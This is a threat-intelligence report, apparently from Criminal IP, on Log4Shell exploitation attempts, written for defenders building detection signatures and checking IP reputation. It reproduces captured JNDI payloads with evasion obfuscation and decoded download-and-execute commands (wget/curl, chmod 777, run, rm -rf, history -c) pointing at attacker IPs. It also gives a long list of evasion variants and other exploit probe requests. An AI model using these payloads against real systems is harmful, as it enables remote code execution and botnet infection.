The Log4j vulnerability has impacted the world, leading hackers to conduct daily scans of servers worldwide in search of those infected with Log4j vulnerabilities, which could potentially allow them to take control of the servers. We have closely examined their scanning technologies to identify servers with Log4j vulnerabilities.
The hackers’ primary method involved sending the packet “${jndi:ldap://..**:53/c}” and analyzing the server’s response. However, this pattern has received extensive media coverage and is quickly being detected and blocked by IDS/IPS systems. As a result, modified attack techniques are now being utilized, as listed in the table below. These variant attack packets employ the approach of splitting and transmitting payloads in the format of j}ndi,{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p},${jndi:${lower:l}${lower:d}a${lower:p}. This technique aims to evade detection by ensuring that the signature “jndi:ldap” remains undetected.
| Common Attack Patterns in Log4j Exploits |
|---|
| “”t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)”” “”t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)”” 8080″ |
| “GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1″” 403 152 “”-“” “”${jndi:ldap://45.12.32.61:1389/OS=${sys:os.name}/HN=${env:HOSTNAME}/feb12a13-5fe3-429a-bd12-ed0c72e2ad20}”” 80″ |
| ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjguMjM1LjgyLjU1OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY4LjIzNS44Mi41NTo4MDgwKXxiYXNo |
| ${jndi:${lower:l}${lower:d}a${lower:p}://world8000.log4j.bin${upper:a}ryedge.io:80/callback} |
Log4j Attack Patterns With Encoding
Hackers also utilize encoding techniques to evade the detection of attack patterns in Log4j exploits. By encoding the character string portion following the LDAP protocol, they can bypass firewalls, security devices, and log analysis systems such as ESM (Enterprise Security Management). The table below presents some representative examples of encoded attack methods. These encoded queries are typically encoded using Base64. Upon decoding, you may discover Linux commands such as wget, bash, python, and chmod, which are commonly used in attacks. Now, let’s proceed to the actual decoding process.
| Log4j attack pattern with additional encoding |
|---|
| (‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//209.141.57.192:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)” |
| (‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}’)” |
| {jndi:ldap://121.140.99.236:1389/Exploit} |
| {jndi:dns://168-235-82-55.referer.scanworld.net}” “{jndi:dns://168-235-82-55.useragent.scanworld.net} |
| (‘${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}’)” |
| (‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//209.141.57.192:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’)” |
| “t(‘${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.181.80.103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j}’)” |
The table below displays the decoded results of the encoded query.
In the first scenario, it is evident that the hackers download the potential attack script “exploit.sh” from their server using wget and curl. The downloaded files are granted execution permissions, allowing the execution of a script that facilitates the infection of malicious code. Notably, the attackers are clever enough to delete the malicious bash files even after execution. As a result, backdoors, trojan horses, and keyloggers are frequently installed without the victims’ knowledge.
Moving on to the second scenario, which involves the command ‘wget http://158.101.118.236/setup; curl -O http://158.118.236/setup;’, we observe that both wget and curl commands are intended to be executed twice. The code is designed to execute curl if wget is not installed on the server. This indicates the script intends to ensure infection occurs regardless of the server’s environment. Similar to the first scenario, the script involves changing the permissions to chmod 777 and editing it as an executable script. Consequently, executing the file leads to its infection.
In the third attack scenario, we observe patterns such as cd/tmp|| cd/var/run|| cd/mnt|| cd/root|| cd/;, which are commonly associated with botnet attacks. Upon analyzing the bin.sh file, it is revealed to be a foothold for executing malicious code related to the same botnet. It is worth noting that a recent alert has been issued regarding the Mozi botnet, which is closely associated with this type of attack.
| Encoding | Decoding | |
|---|---|---|
| 1 | /TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}’) | wget **.***.**.**/Exploit.sh; chmod +x Exploit.sh; ./Exploit.sh; rm -rf Exploit.sh |
| 2 | TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}’) | wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit |
| 3 | /TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}’)” | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl http://192.95.50.228/bins.sh -o bins.sh; wget http://192.95.50.228/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c |
| 4 | TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j}’) | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl http://135.148.91.146/bins.sh -o bins.sh; wget http://135.148.91.146/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c |
If Log4j vulnerabilities are present, it is common to see attacks that involve downloading files potentially containing malicious or attack code from specific server IP addresses. Upon decoding these attacks, it is frequently discovered that the IP addresses used for downloading through tools such as wget or curl are often associated with critical IP addresses. Thus, checking these IP addresses using Criminal IP can help confirm their criticality.
Response Method – Signature Detection Variations
First and foremost, the defense approach at the IPS/IDS/WAF stage should focus on responding to the irregular methods employed by hackers to evade detection rules. It is not necessary to meticulously register each attack keyword mentioned below. Similarly, an excessive reliance on regular expressions is not required. The common characteristic among these attacks is the format of ‘jndi:ldap://hacker-server/Query‘. It is reasonable to expect that ‘jndi’ and ‘ldap’ would have been registered for Log4j detection. Furthermore, these attacks can be detected by incorporating relevant keywords such as ‘${:’, ‘rmi’, and ‘${lower:’.
| ${jndi:ldap://domain.com/j} ${jndi:ldap:/domain.com/a} ${jndi:dns:/domain.com} ${jndi:dns://domain.com/j} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j} ${${::-j}ndi:rmi://domain.com/j} ${jndi:rmi://domainldap.com/j} ${${lower:jndi}:${lower:rmi}://domain.com/j} ${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} ${jndi:${lower:l}${lower:d}a${lower:p}://domain.com} ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a} ${jn${env::-}di:ldap://domain.com/j} ${jn${date:}di${date:’:’}ldap://domain.com/j} ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j} ${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j} ${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j} ${j${::-nD}i${::-:}ldap://domain.com/j} ${j${EnV:K5:-nD}i:ldap://domain.com/j} ${j${loWer:Nd}i${uPper::}ldap://domain.com/j} ${jndi:ldap://127.0.0.1#domain.com/j} ${jnd${upper:ı}:ldap://domain.com/j} ${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j} ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j} ${${date:’j’}${date:’n’}${date:’d’}${date:’i’}:${date:’l’}${date:’d’}${date:’a’}${date:’p’}://domain.com/j} ${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j} ${\u006a\u006e\u0064\u0069:ldap://domain.com/j} ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j} ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j} %24%7Bjndi:ldap://domain.com/j%7D %24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D |
Response Method- Verification of downloaded IP addresses
Furthermore, the URL or IP address included in the query undergoes verification using the IP Intelligence system. For instance, upon conducting a check with Criminal IP, it is determined that 46.161.52.37 from the query exhibits a security vulnerability and has a history of being registered in the honeypot. Additionally, it is included in the Snort Signature. These factors are collectively evaluated, resulting in a single critical score, designating it as a critical IP.
| http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2 |
Detected Attacks With Log4j
As a side note, the following attack packet is just one example among many discovered during Log4j scanning. Hackers do not limit themselves to a single attack. Since the Log4j vulnerability emerged, it is crucial to go beyond defending against Log4j alone and instead monitor the logs of the IP addresses from which Log4j attacks originated. Through the collected web logs, it has been observed that extensive scanning attacks and remote code execution attacks were carried out before the Log4j attack. Therefore, it is essential to update security patches not only for the identified attacks but also for existing or overlooked vulnerabilities throughout the entire process.
| POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /solr/admin/info/system?wt=json GET /securityRealm/user/admin/search/index?q=a HTTP/1.1 GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1″ GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 GET /console/ POST /Autodiscover/Autodiscover.xml HTTP/1.1 POST /_ignition/execute-solution HTTP/1.1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 <- cat/etc/passwd “POST /api/v1 HTTP/1.1 |
This report is based on data from Criminal IP, a Cyber Threat Intelligence search engine. Create a free Criminal IP account today to access the search results cited in the report and search for more extensive threat Intelligence. [Criminal IP’s Official Service Release]
1) log4shell – Quick Guide , https://musana.net/2021/12/13/log4shell-Quick-Guide
Leave a Reply